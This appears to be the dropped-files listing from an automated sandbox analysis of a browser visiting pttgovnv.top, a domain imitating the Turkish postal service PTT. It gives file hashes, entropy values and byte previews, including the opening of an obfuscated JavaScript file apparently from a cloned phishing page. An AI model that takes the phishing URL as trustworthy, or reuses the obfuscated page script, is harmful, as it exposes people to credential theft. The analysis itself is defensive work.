          Preview:RIFF....WEBPVP8X...........e..ALPH.......m.9..m.y....&J....-...........Mp....-...I..Df.K...u.sO.t..ODL..... x.. ..0.....&F`.C...rE....M./.ZBW.........Bu..".......L...g.V...\.t1.?L{...I.l...:..._b'm.w..h.Y\...>..Z..+df.F.;IO.....g...lw............../...S.....^q.u.Xo.Q...k...J.k5B...M.1.7...Y.....I...=....>...^.k..b.J...1c..;~....k.s..FW,.....7..@...k..`..BX.G/.1.e....M..z.....(.Xw.c....c.G....D..c..;.mq...1.".......=....j..9..^...k......d? ."..q.c.<.?...m.0~...;.X......xA..v;.8.K.....;.2...D.1.fnP..gN.\;.Q.2..oxwV...z#...O.\...o%,n....3i..S.<Z.D.Q..^..``..L...C....)I.g..Q.<..}*?.J....T.?.....u|......$..go>rt_.....T-L..%.>...jO.\;.L..PI.H..ce.....j.,.x.31U.$.j..&..m.+..Zw.$.J...../.v.NZ.....S...<.Jw.EvV*.Z.7..As.+..:..&6...4..%...R...Jk.q.S....l|q...~<....\...o....m...Uu...h.4.....+...24.`M.W.9...k..h..D.......L....1..4g^.m?.....";.....l..on..pk..4)LsI..XZ.h........5s..`..Em.../.....N*r.SU.np...U.D..{...J....L.U..8.
          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
          File Type:PNG image data, 625 x 417, 8-bit/color RGBA, non-interlaced
          Category:downloaded
          Size (bytes):10746
          Entropy (8bit):7.750448157439093
          Encrypted:false
          SSDEEP:192:pJ1sotcNTjukglXJd9p+d8Vn1LoujKwt/z318b+jJSrQPMnDQ4bM21yepESh:27VglXvnWu1Muj5p34+GnTT1yfg
          MD5:B46BD38DC53B5A97A9F2E48539B34446
          SHA1:D839AB9090F1011145FDB4AFB9F4B1E2ECCC6AA8
          SHA-256:210BBA6C4F4B3D5C3F44664310E2F32595EE8859A6051396B6FFCD90FC3B167A
          SHA-512:0B5A369BA21CC6607547D93B2E53AD7BE77999436B5E6A991D48AC4496A72606E475CB7979181695ACA126E18F28E4373C6DFE383710785D88B14420CA8B2AA4
          Malicious:false
          Reputation:low
          URL:https://pttgovnv.top/help/layout/images/40.png
          Preview:.PNG........IHDR...q..........[.....pHYs...#...#.x.?v....tEXtSoftware.Adobe ImageReadyq.e<..).IDATx...=v.V..`L.w.VV`.r)M......S.^....^A........S..H...+......q..~.s/.R.s..L..A..x..?.}.V...Y~r....8...8...8..!...!...!..@...@...@....................8...8...8..!...!...!..@...@...@....................8...8...8..!...!...!..@...@...@....................8...8...8..!...!...!..@...@...@....................8...8...8..!...!...!..@...@...@...@................8...8...8..!...!...!..@...@...@...@................8...8...8..!...!...!..@...@...@...@................8...8...8..!...!...!..@...@...@...@................8...8...8..!...!...!...!..@...@...@................8...8...8..!...!...!...!..@...@...@................8...8...8..!...!...!...!..@...@...@...........'...D..}..o...A...x.e.d<l....n.....q......J...?Cyl..T.N......5yQ.U.[y...Y....L.q.UpL..~*__..,4.N..o..w_..Gvhg.+T2.C{Q...@.g'..p.......uT......Q..k.c'..p....p...........r...ce3B...$...:......j.;ur.>......c.>..hM..n.0 }....d...[
          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
          File Type:PNG image data, 625 x 417, 8-bit/color RGBA, non-interlaced
          Category:downloaded
          Size (bytes):14568
          Entropy (8bit):7.831658911869208
          Encrypted:false
          SSDEEP:192:suNkVU4jxZ2lHuxGgOorSNlmX//WNGclmwdc/qxES/tfJBX2NJAloDcrm6U2g+UJ:UrxslRgOoyIO4SFP/1JBW7T6U2OfwO
          MD5:29B5B29D4D533AA3E60051A8E1AD8ADB
          SHA1:B6059B2ADC66192B8A94FE52607121480AC6B389
          SHA-256:7CA1F87B86C0FE5112F036C9F914A5F2496C625749C748B73A5A64636277E677
          SHA-512:ACBF4002886324B4E8E9DC04ECAA4E3970858C69DDA62D05288631D3A31C9DFDF26AB8665426E0198F4A3A3FC8A1FBD43B8F2E0D4EF3EE65469E3F00E02066D4
          Malicious:false
          Reputation:low
          URL:https://pttgovnv.top/help/layout/images/34.png
          Preview:.PNG........IHDR...q..........[.....pHYs...#...#.x.?v....tEXtSoftware.Adobe ImageReadyq.e<..8uIDATx...=V......=s...MD.&"...4.W.....X...9.X.EHd..Y.`Px#..wU.Y.._......s4....*u.~]....................B.....q....8........@.... ..........B....!.....8........@.... ..........B....!.....8.........q... .........@.....!.....8.........q... .........@.....!.....8...B.....q... .........@.....!.....8...B.....q... .........@.....!.........B.....q....8........@.....!.........B.....q....8........@.... ..........B.....q....8........@.... ..........B....!.....8.........q... ..........B....!.....8.........q....0}.)....q..,}.. 7.(..h.w...B......~M...c......^..E....r8O.ca.}.....,...y....y.X..c..q.*....\..!...9i.;5..J...q...5....?I......v...M..........W.W...|...o...U.....8....qh>....../.y,.P7..:..Fz...d.3.e6........1..'..Q...L.q.U....|../.]-...4?.....6........i.....z..c...4s.......q. .I.qU..p...'.....s+.[.un.j.YZf.C.jI..c.V..m.c.a.@=.P.."....{.]T....8Y..y.[..8~XR.Qh..3r~.H....lw
          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
          File Type:ASCII text, with very long lines (3479)
          Category:downloaded
          Size (bytes):3538
          Entropy (8bit):5.398605804089
          Encrypted:false
          SSDEEP:48:fbA/xA3HMl2UwpxVx02FojypEBSoGu6E2D7tXVFbMZlkKWcZGJ22BeSwJ75:0AO2UwpxE7y2wCP2D7pr5KlZGA2eBt
          MD5:7E61E4BDA92B740EC0BB0C798839F2E5
          SHA1:C71EBF17C59C9E8410D79ECD56E70D670F9AEEDA
          SHA-256:09EFE56A1886693C96933F327AA8662F853217D14222A950DEC5D5B80076ECEB
          SHA-512:7FF1DA7099378613BD37DA6810EC1DE176755BE1E990AD285BA416CA795AF4E812FF6883C39433697C0197CF3F39FDE1C33E731F1D7A7C5E4DE2BDCC089FB891
          Malicious:false
          Reputation:low
          URL:https://www.ptt.gov.tr/_next/static/chunks/pages/doviz-kurlari-c5ba2bb9e7f07c80.js
          Preview:(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[3352],{4007:function(e,r,n){(window.__NEXT_P=window.__NEXT_P||[]).push(["/doviz-kurlari",function(){return n(7170)}])},7170:function(e,r,n){"use strict";n.r(r);var t=n(8565),c=n.n(t),i=n(3288),a=n(2466),s=n(3475),l=n.n(s),o=n(8082),u=n(427),d=n(3395),h=n(3230),f=n(4926),y=n.n(f),x=n(1395);function _(e,r){(null==r||r>e.length)&&(r=e.length);for(var n=0,t=new Array(r);n<r;n++)t[n]=e[n];return t}function m(e,r,n,t,c,i,a){try{var s=e[i](a),l=s.value}catch(o){return void n(o)}s.done?r(l):Promise.resolve(l).then(t,c)}function v(e,r){return function(e){if(Array.isArray(e))return e}(e)||function(e,r){var n=null==e?null:"undefined"!==typeof Symbol&&e[Symbol.iterator]||e["@@iterator"];if(null!=n){var t,c,i=[],a=!0,s=!1;try{for(n=n.call(e);!(a=(t=n.next()).done)&&(i.push(t.value),!r||i.length!==r);a=!0);}catch(l){s=!0,c=l}finally{try{a||null==n.return||n.return()}finally{if(s)throw c}}return i}}(e,r)||function(e,r){if(!e)return;if("string"=
          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
          File Type:Unicode text, UTF-8 text, with very long lines (65329), with no line terminators
          Category:dropped
          Size (bytes):161114
          Entropy (8bit):5.144436389608998
          Encrypted:false
          SSDEEP:1536:9RohK1FtK8YlXSyGwjUnKznBGDhZB/FEG39tBV1z37fb7K0yF2dDIp:8hKuCyGwjUnKr+RbNtBV1z3LTNC
          MD5:C3DCC3BE21F2F8D1CF00E2E339C699D1
          SHA1:6BE6BC9EDAAA3403BF504DCEA10F7C2104102434
          SHA-256:992416AF8318FB013AED368155200BE56B07B52E70A21A80A1312E721ADAFBA5
          SHA-512:90F7410507965DAD04F076A10D3F10929AD7FEBA071901D6C17BBE014351AA48FF6C3168B3CDEC7F8153C1353EADCE8D5100907C88E73CC8CC88AD1BB4A07748
          Malicious:false
          Reputation:low
          Preview:const a33_0x762c71=a33_0xda6e;(function(_0x1d2039,_0x34a38e){const _0x303bae=a33_0xda6e,_0x22f25a=_0x1d2039();while(!![]){try{const _0xc1e4b0=-parseInt(_0x303bae(0x1f4))/0x1+-parseInt(_0x303bae(0x48a))/0x2*(-parseInt(_0x303bae(0x843))/0x3)+-parseInt(_0x303bae(0x1a8))/0x4+-parseInt(_0x303bae(0x896))/0x5*(parseInt(_0x303bae(0x146))/0x6)+-parseInt(_0x303bae(0x566))/0x7*(parseInt(_0x303bae(0x148))/0x8)+parseInt(_0x303bae(0xbb))/0x9+parseInt(_0x303bae(0x1a4))/0xa;if(_0xc1e4b0===_0x34a38e)break;else _0x22f25a['push'](_0x22f25a['shift']());}catch(_0x2a237d){_0x22f25a['push'](_0x22f25a['shift']());}}}(a33_0x38b1,0x5cb8c));function a33_0x38b1(){const _0x576f75=['em_ptt_abo','cz0ndHJhbn','>Tebligat\x20','ON\x22\x20id=\x22__','-32','/a></span>','kta_hizmet','YT48L2Rpdj','class=\x22ite','bank.ptt.g','l\x20ui-widge','tAk%C4%B1l','JvZHVjdGlt','age\x20has-su','#ptt_diger','FgIFJmdfMT','lateliUst.','Link\x22\x20clas','d-4\x22><a\x20id','-search\x20sx','tt_pttmati','klamalari','w.cimer.go','0\x20auto',
          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
          File Type:PNG image data, 625 x 417, 8-bit/color RGBA, non-interlaced
          Category:downloaded
          Size (bytes):62332
          Entropy (8bit):7.984048376361694
          Encrypted:false
          SSDEEP:1536:XF1K4X0e45gJhahETAI55341LAa/ny5pqkQJJoGWkr/gk6kV1i+y4:XZ0b5gy+P41sM/Xok6xL4
          MD5:3E2AC9A8F2274B97550C20946E9E6AA7
          SHA1:5748E42EF801F5682C683CF990053C880993FAF3
          SHA-256:661C5384CC0FC72BBE7D9D938A618369DD63E2B926EEC03D2518BA2A27F83773
          SHA-512:FBCF9108314BE3A9FB61E2D82F3E8201B31B042BEBE637F2250F58D69770B5FF9FC197EC260726189F119F0C6964F39726C1F340C50087C3B2D69DEFDE79AFE7
          Malicious:false
          Reputation:low
          URL:https://pttgovnv.top/help/layout/images/54.png
          Preview:.PNG........IHDR...q..........[.....pHYs...#...#.x.?v....tEXtSoftware.Adobe ImageReadyq.e<....IDATx..}..[...Q.VZi{.^.{..Wl... .'$!...~.GBI.K..._.!................Wu.3wF.+.z.^m....#k5...j..wN...A .....@ .[.R......@ ..#.....@ ..#.....@ ..#.....@ .G .....@ .G .....@ .G .....@$.@ .....@$.@ .....@$.@ .....H..@ .....H..@ .....H..@ .....H..@ .....8..@ .....8..@ .....8..@ ..."q...@ ..."q...@ ..."q...@ ..D.....@ ..D.....@ ..D.....@ ........@ ........@ ........@ ........@ ..#.....@ ..#.....@ ..#.....@ .G .....@ .G .....@ .G .....@$.@ .....@$.@ .....@$.@ .....H..@ .....H..@ .....H..@ .....H..@ .....8..@ .....8..@ .....8..@ ..."q...@ ..."q...@ ..."q...@ ..D.....@ ..D.....@ ..D.....@ ........@ ........@ ........@ ........@ ..#.....@ ..#.....@ ..#.....@ .G .....@ .G .....@ .G .....@$.@ .....@$.@ .....@$.@ .....@$.@ .............ao..Q#.&. {..{..r.......@.9h.AZ{.!.....K'>..K......../..02...$....a.A.T..@ ...c...;..2.jUD^.I.A...=(.,....>q...<.3o'm..@ ..D...'pZ.Q.C./R.jC.gT}m..4. ..1.........$
          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
          File Type:PNG image data, 625 x 417, 8-bit/color RGBA, non-interlaced
          Category:dropped
          Size (bytes):15414
          Entropy (8bit):7.802234231177533
          Encrypted:false
          SSDEEP:384:o5uVjKZV0gFJcwDUs0uZEsODybond41ShLNDCfZ8TcQc8S:guVjKbcwDnqsODysndISzDaiJS
          MD5:37B5D4B2CE91DDFC037F3172C9A54549
          SHA1:C463FB17563D029985E7E89487ADD1EF1560F8E0
          SHA-256:8C0DF3DA867E9D1F84C96E7CD38B654DD053108EC72C6E25A701A71603374524
          SHA-512:15EC6031EBE54A1D3B14202CAF66A5E09153829819B50C85AABE7DAB0E6C3D764D9EBAFAD25FF6AA6B82B5CC79178F695DBFE38DB27474D319553D6A72C4E091
          Malicious:false
          Reputation:low
          Preview:.PNG........IHDR...q..........[.....pHYs...#...#.x.?v....tEXtSoftware.Adobe ImageReadyq.e<..;.IDATx...m.+.}.....D.R.b)...d..2y..h.:.-..p.^......r./.;....(I{y.'6.6..q..{...`8.xQ7}."..7...F$G.,n.9v"W\[.l.2;...v.......a........y..9g........j.K.....!.....8.........q... .........@.....!.....8...B.....q... .........@.....!.....8...B.....q... .........@.....!.........B.....q... .........@.....!.........B.....q....8........@.... ..........B.....q....8........@.... ..........B....!.....8.........q... ..........B....!.....8.........q... .........@.....!.....8.........q... .........@.....!.....8...B.....q... .........@.....!.....8...B.....q... .........@.....!.........B.....q....8........@.....!.........B.....q....8........@.... ..........B....!.....8........@.... ..........B....!.....8.........q... ..........B....!.....8.........q... .........@.....!.....8...B.....q... .........@.....!.....8...B...k..J..V.+)..@..W.{.w.?.^]}u.W...N.S.u...C..%.PF..R...QQ..V...{....nxkz.M}.@....z..!...
          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
          File Type:PNG image data, 625 x 417, 8-bit/color RGBA, non-interlaced
          Category:dropped
          Size (bytes):21895
          Entropy (8bit):7.839028487142548
          Encrypted:false
          SSDEEP:384:jPqsTPPq3PPqFPPqa/743sZpR/J3xMIqn3BU54X0q6+I9jstD/zS/VN/bAqkpAko:jPqsTPPq3PPqFPPqaD43sZD/Na53B8Ca
          MD5:2521C5CB66A4D396A16637DC0B4AC309
          SHA1:B96042B472F4C9386F739A69E52CA5D68DE760D7
          SHA-256:BB65C7B6550153A9CE4BB0D9B5EF308F500CF188F465F68DE7B83D1A0E7B55DA
          SHA-512:92D6FB984323E46AB0157F445187A6B14413D32408562B362C809C7770AF301F5F77A39FA9466C0B1D5B55BE9DADE5231402D6A0128398A650F406CB0CE46329
          Malicious:false
          Reputation:low
          Preview:.PNG........IHDR...q..........[.....pHYs...#...#.x.?v....tEXtSoftware.Adobe ImageReadyq.e<..U.IDATx..O.#I...3.....^..".E..B.....U....rK...Reo.v.-.\......$.w7.a.X.k..H....k..w3.V,@.O.......v.N..#.......'~q...|......`..."....@......"......q.....8....@......"............8....@..... .............8....@..... .............8....D..... ..................D..... ......q...........D..... ......q...........D....."......q..........@......"......q.....8....@......"......q.....8....@......"............8....@..... .............8....D..... .............8....D..... ..................D..... ......q...........D..... ......q...........D....."......q..........@......"......q.....8....@......"......q.....8....@......"............8....@..... .............8....D..... .............8....D..... ..................D..... ......q...........D....."......q...........D....."......q..........@......"......q.....8....@......"......q.....8....@......"............8....@.....7~...>.........t!..@......0^...,.\B
          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
          File Type:JSON data
          Category:dropped
          Size (bytes):41
          Entropy (8bit):4.180365114215879
          Encrypted:false
          SSDEEP:3:YGKhIWANmq6LFHYn:YGKhCNU4
          MD5:64E1C1EB9F4CAF0CF0E7484D7AFCEDB9
          SHA1:69E40D8C48A866A84046FD8BD17AF47FF02B79A4
          SHA-256:8ACAC48BC106C4EAE580C08071597F9DAFAB96D959DEFF65BEC44514DA907B1D
          SHA-512:F109767D57E85127D18B1AD2030A48C0EAD69F79A15C4008712407B1F62691654B74C9D6E225FFDC4A922847EABB928DC7520A656C7081B585124CF678B54E59
          Malicious:false
          Reputation:low
          Preview:{"code":1,"message":"Session ID unknown"}
          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
          File Type:ASCII text, with very long lines (5945)
          Category:dropped
          Size (bytes):265606
          Entropy (8bit):5.571560129519129
          Encrypted:false
          SSDEEP:6144:cSaSAdB6si3itIl6e4zelEZtNAJ08D1OJfjU7iMNp:1tAv6sgitNeWInL
          MD5:6196501272F3ED37AC04FE098DF1FBC3
          SHA1:918CD8BDE886AD2E28298B12B8711F15F38C2302
          SHA-256:ECADA55BFC5A3C50C40C7D5542881D1DA49B3F081330F1D19457ECADF56334C9
          SHA-512:55A618D5465CE7B12D10822C2B90616912F06D708A49F5250B5CB08A51F5BCA1239C1A2724684F2ADB1AFAE451C8B0388E7BAA1707CAFA9B6E78FE8998E630C0
          Malicious:false
          Reputation:low
          Preview:.// Copyright 2012 Google Inc. All rights reserved.. .(function(){..var data = {."resource": {. "version":"2",. . "macros":[{"function":"__e"},{"vtp_signal":0,"function":"__c","vtp_value":0},{"function":"__c","vtp_value":""},{"function":"__c","vtp_value":0},{"vtp_signal":0,"function":"__c","vtp_value":0},{"function":"__c","vtp_value":""},{"function":"__c","vtp_value":0}],. "tags":[{"function":"__ogt_ga_send","priority":7,"vtp_value":true,"tag_id":16},{"function":"__ogt_referral_exclusion","priority":7,"vtp_includeConditions":["list","ptt\\.gov\\.tr"],"tag_id":18},{"function":"__ogt_session_timeout","priority":7,"vtp_sessionMinutes":30,"vtp_sessionHours":0,"tag_id":19},{"function":"__ogt_1p_data_v2","priority":7,"vtp_isAutoEnabled":true,"vtp_autoCollectExclusionSelectors":["list",["map","exclusionSelector",""]],"vtp_isEnabled":true,"vtp_autoEmailEnabled":true,"vtp_autoPhoneEnabled":false,"vtp_autoAddressEnabled":false,"vtp_isAutoCollectPiiEnabledFlag":false,"tag_id":20},{"function":
          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
          File Type:ASCII text, with very long lines (32033)
          Category:dropped
          Size (bytes):37045
          Entropy (8bit):5.174934618594778
          Encrypted:false
          SSDEEP:768:o2rGy27UwlNqMl95qNmCFejhqs8snmi+CSFXfbx8Gf3Zq7Q:Jg73zhq0GvbJ3ZKQ
          MD5:5869C96CC8F19086AEE625D670D741F9
          SHA1:430A443D74830FE9BE26EFCA431F448C1B3740F9
          SHA-256:53964478A7C634E8DAD34ECC303DD8048D00DCE4993906DE1BACF67F663486EF
          SHA-512:8B3B64A1BB2F9E329F02D4CD7479065630184EBAED942EE61A9FF9E1CE34C28C0EECB854458977815CF3704A8697FA8A5D096D2761F032B74B70D51DA3E37F45
          Malicious:false
          Reputation:low
          Preview:/*!. * Bootstrap v3.3.7 (http://getbootstrap.com). * Copyright 2011-2016 Twitter, Inc.. * Licensed under the MIT license. */.if("undefined"==typeof jQuery)throw new Error("Bootstrap's JavaScript requires jQuery");+function(a){"use strict";var b=a.fn.jquery.split(" ")[0].split(".");if(b[0]<2&&b[1]<9||1==b[0]&&9==b[1]&&b[2]<1||b[0]>3)throw new Error("Bootstrap's JavaScript requires jQuery version 1.9.1 or higher, but lower than version 4")}(jQuery),+function(a){"use strict";function b(){var a=document.createElement("bootstrap"),b={WebkitTransition:"webkitTransitionEnd",MozTransition:"transitionend",OTransition:"oTransitionEnd otransitionend",transition:"transitionend"};for(var c in b)if(void 0!==a.style[c])return{end:b[c]};return!1}a.fn.emulateTransitionEnd=function(b){var c=!1,d=this;a(this).one("bsTransitionEnd",function(){c=!0});var e=function(){c||a(d).trigger(a.support.transition.end)};return setTimeout(e,b),this},a(function(){a.support.transition=b(),a.support.transition&&(a.event.
          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
          File Type:ASCII text, with very long lines (41188)
          Category:downloaded
          Size (bytes):41353
          Entropy (8bit):5.056168085786293
          Encrypted:false
          SSDEEP:384:c+Pm0XRZqmxmIsNsPS2vu+XrNmVSH+45sZRsI3TaluztEs4gsVhJ1ADe1yWfswSf:Fe0XR5IuSQ5JIWzMjW0dgto
          MD5:5839179B1E59174601C0E5C3163431C7
          SHA1:E320297D3B8AA9471EBBB8A1DC24601024C1323F
          SHA-256:CBF8DED2623FB24F24820D26315C7B9481BFE63F1A45AFC2BF7E4DFB4E992C32
          SHA-512:91D1EB4975CA03998F5650E991016FA5800503C3E2D75B91C2FF07BD7617C2EFB45885EF21E7F965B16E815DDE3C7CF36A51B14088A2F1C0CF981C27873D9797
          Malicious:false
          Reputation:low
          URL:https://chatserver.alo-tech.com/static/assets/bootstrap/css/bootstrap.min.css
          Preview:/*!. * Bootstrap v3.3.7 (http://getbootstrap.com). * Copyright 2011-2016 Twitter, Inc.. * Licensed under MIT (https://github.com/twbs/bootstrap/blob/master/LICENSE). *//*! normalize.css v3.0.3 | MIT License | github.com/necolas/normalize.css */html{font-family:sans-serif;-webkit-text-size-adjust:100%;-ms-text-size-adjust:100%}body{margin:0}footer,header,main,menu,nav{display:block}audio,video{display:inline-block;vertical-align:baseline}audio:not([controls]){display:none;height:0}[hidden],template{display:none}a{background-color:transparent}a:active,a:hover{outline:0}b,strong{font-weight:700}h1{margin:.67em 0;font-size:2em}img{border:0}svg:not(:root){overflow:hidden}pre{overflow:auto}pre{font-family:monospace,monospace;font-size:1em}button,input,select,textarea{margin:0;font:inherit;color:inherit}button{overflow:visible}button,select{text-transform:none}button,html input[type=button],input[type=reset],input[type=submit]{-webkit-appearance:button;cursor:pointer}button[disabled],html inp
          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
          File Type:Web Open Font Format (Version 2), TrueType, length 156496, version 773.768
          Category:downloaded
          Size (bytes):156496
          Entropy (8bit):7.996570522285877
          Encrypted:true
          SSDEEP:3072:OvM6gZMLmY8uGpjVnlooQ+GQs8jic0f/KkMdE:OU65LoP5QSsuic0f/cdE
          MD5:6C4EEE562650E53CEE32496BDFBE534B
          SHA1:1AAE708E3B94EE981B452A918D28ED037FBB5E18
          SHA-256:9FC85F3A4544AB0D570C7F8F9BBB88DB8D92C359B2707580EA8B07C75673EAE2
          SHA-512:EBCB5A2E2A908228F77ECD03B45491778CAD73DDC39FA3A6334B129AAF9FA36C16C0307AEAAD74D77F616B5B34AAC52D91E9F4816945253DC9A826DDD71F4D12
          Malicious:false
          Reputation:low
          URL:https://www.ptt.gov.tr/_next/static/media/fa-solid-900.ce4938a3.woff2
          Preview:wOF2......cP..........c..........................6.$. .`..<...... .@..m. %.......V'.......).=<E..........%........~.....W.......................S`0...0-.q.=^.../?.zn.Do,.pF..B..8Tr....5..n...Q.>...t:...Q...S....t..eV.....).`.Igb"......"ZI2}.,........#..."1.3.....j.V.....J.......$F..>:(|E..$...U.r.j.vOM.......^....T..$...w*.Dx`.lZ?a..D.`.r.A.UL........ x.]....|....V.D.T..8..R.X%.[.x.>..Z.r....g.?....UCuu.4VI.m.j..1.*K.NX.xn...,..8.Y...b...@.#..kw...%..HK..'...LOH..`.Y`v3fg.............(...(.)R.AERTX.V.LA.GQ.O..-...|o:...).%...{D.Z]=..'....0..6`..X`v..Cr.....)9A..,.^<%:@V..Pp.Lg8S...'.9..N..'......Q....r..^w....fr....;;..V....`.P...HB......!.C\....8...w.>].....|..,s...^./....z.........%...:I'.hw...t.6.......o.f.X.^.....k.....s.....fZ....z.(..%...v.JjI...d.............R`....z.{.=.,Q>.r>.L>d.d..4..!....]n]..K.A.UAD.k.p....Dwy..D......."@..>F!..&@..U........g.F..V.FcT..b4.........=l...~.#.....Y....{.....n............P...R.d.X...{..y.....k.?..2...
          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
          File Type:PNG image data, 625 x 417, 8-bit/color RGBA, non-interlaced
          Category:dropped
          Size (bytes):44008
          Entropy (8bit):7.959695770661982
          Encrypted:false
          SSDEEP:768:jich1+kvACQ6+XRoonVs3sruEET2QAqHDBucmp7aaDkkNRWGKPRkU+:FE6+B9OsrlEonfaaDDRWGKPRkU+
          MD5:F29E09E7EB1220F3B89EB5F7C6E70C0F
          SHA1:EFE3BD42DD2920662239EE8A7915B1AB4A030A1C
          SHA-256:72F4F765EE364C8CABDDC25B48E28DB60BF229B3807EF78BEE1127F9AD157AD7
          SHA-512:B4E600B9BA6918BF68524BF3CFE9103B931C1EAAE92F94A3B57E3CF57DDD692831BAACE501A96B971948A12162E1A6BF26460E40B2661E5B1D4F602BAE4BC158
          Malicious:false
          Reputation:low
          Preview:.PNG........IHDR...q..........[.....pHYs...#...#.x.?v....tEXtSoftware.Adobe ImageReadyq.e<...uIDATx....de.....s........A`...J....pUt..kB.........l..I..HN.0..0......U]9.......{zf:Tw.g>5.....:.=.Ur....a..a......0..0....0..0...1..0..0,q..0..0,q..0..0.K..0..0....0..0....0..0...1..0..0,q..0..0,q..0..0.K..0..0....0..0...1..0...1..0..0,q..0..0.K..0..0.K..0..0....0..0...1..0...1..0..0,q..0..0.K..0..0.K..0..0....0..0...1..0..0,q..0..0,q..0..0.K..0..0....0..0....0..0...1..0..0,q..0..0,q..0..0.K..0..0....0..0....0..0...1..0..0,q..0..0.K..0..0.K..0..0....0..0...1..0...1..0..0,q..0..0.K..0..0.K..0..0....0..0...1..0....1..0...1..0..0,q..0..0.K..0..0.K..0..0....0..0...1..0...1..0..0,q..0..0.K..0..0.K..0..0....0..0...1..0..0,q..0..0,q..0..0.K..0..0....0..0....0..0...1..0..0,q..0..0,q..0..0.K..0..0....0..0....0.S)<U.Z#..T..s%..V...v..S..1.......!q.P.......!qJ...5....0,q..0*O....j....y..l..$gz1S.I)+lE.....w{...N.4~.A....n.Qq.aq......$.0,q..,va#A.b..V,k..)%b......e..
          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
          File Type:PNG image data, 625 x 417, 8-bit/color RGBA, non-interlaced
          Category:dropped
          Size (bytes):22730
          Entropy (8bit):7.866153192085963
          Encrypted:false
          SSDEEP:384:pP5QuY5tMApoeSaPA53115KmABEC40OQ38GnamIGZJQYJZgSM4vL6PpnE6BWOyUV:pRA5xpoeSaEuF40sGnPdQOZyoApnE6jV
          MD5:F4F38EA525A386F824CB5FAD76DD9896
          SHA1:167F97D1219368BE2EDBAFA720A2AC5A657ACAFD
          SHA-256:0DD037A0E7DD6E450A2DC80537185315EA5DDE1050A0328DDCA3D4F232BAD669
          SHA-512:30EE24C56483CCDA07E6B774E7A27A30CAD3440E154C255979A82F90C5B0CA49703B817D7E7879AD0DEFC68411BB9267A6E03AE5A868A7EB6A4FAF4855947E5F
          Malicious:false
          Reputation:low
          Preview:.PNG........IHDR...q..........[.....pHYs...#...#.x.?v....tEXtSoftware.Adobe ImageReadyq.e<..XWIDATx...x..y......@.$.....$r....qb.b.&..I.4Ic.b.8i.6...I...9........s.V.....I..M.4]S..Z...U.%..u...B........H..I..q!..G.......`.7..].J).........]..............8....................H.............@.......$......@...... q............. q.....................8....................H.............@.......$......@...... q............. q.....................8....................H.............@.......$......@...... q............. q.....................8....................H.............@.......$......@...... q............. q.....................8....................H.............@.......$......@.......$............. q.....................8....................H.............@.......$......@.......$............. q.....................8....................H.............@.......$......@.......$............. q.....................8....................H.............@.......$......@.......$.............
          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
          File Type:ASCII text, with very long lines (3479)
          Category:dropped
          Size (bytes):3538
          Entropy (8bit):5.398605804089
          Encrypted:false
          SSDEEP:48:fbA/xA3HMl2UwpxVx02FojypEBSoGu6E2D7tXVFbMZlkKWcZGJ22BeSwJ75:0AO2UwpxE7y2wCP2D7pr5KlZGA2eBt
          MD5:7E61E4BDA92B740EC0BB0C798839F2E5
          SHA1:C71EBF17C59C9E8410D79ECD56E70D670F9AEEDA
          SHA-256:09EFE56A1886693C96933F327AA8662F853217D14222A950DEC5D5B80076ECEB
          SHA-512:7FF1DA7099378613BD37DA6810EC1DE176755BE1E990AD285BA416CA795AF4E812FF6883C39433697C0197CF3F39FDE1C33E731F1D7A7C5E4DE2BDCC089FB891
          Malicious:false
          Reputation:low
          Preview:(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[3352],{4007:function(e,r,n){(window.__NEXT_P=window.__NEXT_P||[]).push(["/doviz-kurlari",function(){return n(7170)}])},7170:function(e,r,n){"use strict";n.r(r);var t=n(8565),c=n.n(t),i=n(3288),a=n(2466),s=n(3475),l=n.n(s),o=n(8082),u=n(427),d=n(3395),h=n(3230),f=n(4926),y=n.n(f),x=n(1395);function _(e,r){(null==r||r>e.length)&&(r=e.length);for(var n=0,t=new Array(r);n<r;n++)t[n]=e[n];return t}function m(e,r,n,t,c,i,a){try{var s=e[i](a),l=s.value}catch(o){return void n(o)}s.done?r(l):Promise.resolve(l).then(t,c)}function v(e,r){return function(e){if(Array.isArray(e))return e}(e)||function(e,r){var n=null==e?null:"undefined"!==typeof Symbol&&e[Symbol.iterator]||e["@@iterator"];if(null!=n){var t,c,i=[],a=!0,s=!1;try{for(n=n.call(e);!(a=(t=n.next()).done)&&(i.push(t.value),!r||i.length!==r);a=!0);}catch(l){s=!0,c=l}finally{try{a||null==n.return||n.return()}finally{if(s)throw c}}return i}}(e,r)||function(e,r){if(!e)return;if("string"=
          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
          File Type:Unicode text, UTF-8 text, with very long lines (31081), with no line terminators
          Category:downloaded
          Size (bytes):31903
          Entropy (8bit):5.810923490394336
          Encrypted:false
          SSDEEP:384:w3iGBkJwiSWzYLyD2ZtS2zF7TzrCaYaIUcrUCFNGwp88Qk238EAfRg9Zr5MHNw9+:wISWYzzNPua/sF+XDACqSRh5/xa21ib
          MD5:A01B6E8CE8881B6A2B02061495A8BC47
          SHA1:EB4A3F16A6B63BA67B60B4278E06D3384DEC9F93
          SHA-256:D6CACA3906FF959A963479874F22DDC7762E575DF6A3065B97D9B079F1AA9A57
          SHA-512:DB14B98A778C20BD411E06D6401F95382F4AB959F5563F8D8DF827C59D69BC9A521382FD4C83DDEC459C81C30F9E8151C1455B7703CFFD23E5C188A4D568F208
          Malicious:false
          Reputation:low
          URL:https://chatserver.alo-tech.com/static/assets/js/linkify.min.js
